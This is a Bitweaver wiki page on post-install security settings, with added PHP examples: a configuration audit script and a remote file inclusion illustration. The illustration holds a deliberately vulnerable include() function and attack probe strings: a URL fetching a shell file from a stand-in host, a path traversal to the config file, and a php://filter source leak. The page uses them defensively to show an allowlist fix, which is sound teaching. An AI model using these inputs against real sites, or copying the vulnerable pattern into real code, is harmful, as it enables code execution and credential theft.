Security

Bitweaver security settings

Created by: laetzer, Last modification: 15 Jul 2008 (16:13 UTC) by laetzer

Bitweaver 2

Security settings

After you installed bitweaver, check the following settings:
  • In /kernel/config_inc.php the parameter IS_LIVE should be "true" (it is "true" by default). With it on, error messages are no longer exposed to visitors. To see the errors yourself, either monitor the error logs directly on the server, or set IS_LIVE to "false" only while testing and developing (with other protection in place, because visitors will then see the messages too).
  • Rename your /install/ directory. Rename it back only to install new packages.
  • In Admin > Users > Permissions, make sure that Anonymous is not allowed to attach files to content (not allowed by default).
  • If users are allowed to input HTML, enable HTMLPurifier, which strips malicious code.
  • If Anonymous can submit content, enable CAPTCHA (depends on your server's setup).
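As an added example (not bitweaver's own code), a small PHP script that audits the two items of the checklist above that can be verified from the file system: IS_LIVE and the presence of the /install/ directory. It assumes that IS_LIVE is set in kernel/config_inc.php with define('IS_LIVE', true) and that the installer lives in install/ under the bitweaver root; both are assumptions about the layout, not facts taken from this page. The other items (permissions, HTMLPurifier, CAPTCHA) live in the database and the admin UI and are not covered here.

```php
<?php
// Added post-install audit; not part of bitweaver. Assumes the config line has
// the form define('IS_LIVE', true) and the installer is <root>/install/.

function isLiveEnabled(string $configSource): ?bool
{
    // Match define('IS_LIVE', true) or define("IS_LIVE", false), any spacing/case.
    $re = '/define\s*\(\s*[\'"]IS_LIVE[\'"]\s*,\s*(true|false)\s*\)/i';
    if (preg_match($re, $configSource, $m)) {
        return strtolower($m[1]) === 'true';
    }
    return null; // setting not found at all: report it, do not assume "true"
}

function auditInstall(string $root): array
{
    $findings = [];

    $config = @file_get_contents($root . '/kernel/config_inc.php');
    if ($config === false) {
        $findings[] = 'kernel/config_inc.php not readable';
    } elseif (isLiveEnabled($config) !== true) {
        $findings[] = 'IS_LIVE is not true: PHP/database errors are shown to visitors';
    }

    if (is_dir($root . '/install')) {
        $findings[] = '/install/ still present: rename it until you need to install packages';
    }

    return $findings;
}

// Self-check against a constructed directory tree so this runs offline.
$root = sys_get_temp_dir() . '/bw-audit-' . bin2hex(random_bytes(4));
mkdir("$root/kernel", 0700, true);
mkdir("$root/install", 0700);
file_put_contents("$root/kernel/config_inc.php", "<?php\ndefine('IS_LIVE', false);\n");

echo "Before hardening:\n";
print_r(auditInstall($root));

// Apply the two fixes from the checklist and re-run the audit.
file_put_contents("$root/kernel/config_inc.php", "<?php\ndefine('IS_LIVE', true);\n");
rename("$root/install", "$root/install.disabled");

echo "After hardening:\n";
print_r(auditInstall($root));

// Tidy up the temporary tree.
unlink("$root/kernel/config_inc.php");
rmdir("$root/kernel");
rmdir("$root/install.disabled");
rmdir($root);
```

Run it with `php audit.php`; the first run lists both findings, the second lists none. To audit a real install, replace the constructed `$root` with the path of your bitweaver directory and drop the self-check part.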

Security issues

wiki_url_import

The "suck_url Information Disclosure" issue was fixed in version 2.1. Before that, it was exploitable only when the admin had turned on the feature wiki_url_import (off by default).

Hacking attempts

The script-kiddie plague du jour is remote file inclusion: exploiting code that does include($varWithSomeUrlFromGetString); so that PHP fetched from an attacker-supplied URL is executed on your server. If such an attack is attempted against a bitweaver install, it might mail an error message to you, the admin, saying something like "unknown column" or "unknown sort order" (note that normal users browsing your pages never see an error message unless you set IS_LIVE to false in /kernel/config_inc.php). The error mail tells you that the attempted hack failed, i.e., that it didn't do anything.
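An added example, not code from bitweaver: the include() pattern the paragraph describes next to a hardened version that maps the request parameter to a fixed allowlist instead of building a path from it. The parameter name, the pages/ directory and the allowlist entries are illustrative, and the probe values at the end are constructed to show what the resolver does with typical attack input.

```php
<?php
// Added illustration of the include($var) problem; not bitweaver code.
// Names ($_GET['page'], pages/, the PAGES allowlist) are hypothetical.

// VULNERABLE: the attacker controls the include path. With allow_url_include
// enabled, ?page=http://evil.example/shell.txt makes PHP fetch and execute the
// remote file. With it disabled, ../ traversal still includes arbitrary local
// files (an uploaded file, a log containing injected PHP), and the php://filter
// wrapper can leak source such as the database password in config_inc.php.
function renderVulnerable(string $page): void
{
    include $page;
}

// HARDENED: the request parameter is only ever a key into a fixed map, so the
// raw string never reaches include(). Unknown keys resolve to nothing.
const PAGES = [
    'home'  => 'pages/home.php',
    'about' => 'pages/about.php',
];

function resolvePage(string $requested): ?string
{
    return PAGES[$requested] ?? null;
}

function renderHardened(string $requested): void
{
    $file = resolvePage($requested);
    if ($file === null) {
        http_response_code(404);
        echo 'no such page';
        return;
    }
    include __DIR__ . '/' . $file;
}

// Constructed probe values: one legitimate key and three typical attack strings.
$probes = [
    'home',
    'http://evil.example/shell.txt',
    '../../kernel/config_inc.php',
    'php://filter/convert.base64-encode/resource=kernel/config_inc.php',
];
foreach ($probes as $p) {
    printf("%-70s -> %s\n", $p, resolvePage($p) ?? 'rejected');
}

// In a real request handler you would call renderHardened($_GET['page'] ?? 'home').
```

Independently of the allowlist, keep allow_url_include off in php.ini (it is off by default) and consider allow_url_fopen as well; the allowlist is what protects you against the local-file variants that those settings do not cover.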

3rd party applications

PHP security settings

  • For security reasons, your server might run PHP with features like open_basedir or safe_mode switched ON. See Install under safe mode.

Bitweaver 1.3

Bitweaver versions 1.3 and before were released in 2004/2005 (see bitweaverRoadMap). These versions are not supported anymore: the code has not been updated since release, and they contain a couple of serious security issues. Some stem from 3rd party code, like left-over code from older versions or the infamous Xmlrpc bug (if that feature is enabled). Many of the improvements introduced with bitweaver 2 addressed these issues specifically. In other words, don't install version 1.3 anymore. If you're running version 1.3 and are concerned about security, please upgrade bitweaver.
Page History

Version  User            IP              Date / Comment
6        laetzer         85.178.0.170    13 Feb 2010 (19:57 UTC): added alias (current)
5        Benjamin Couhe  80.4.75.27
4        laetzer         141.20.150.43
3        laetzer         141.20.150.43
2        laetzer         85.178.63.167
1        laetzer         85.178.3.165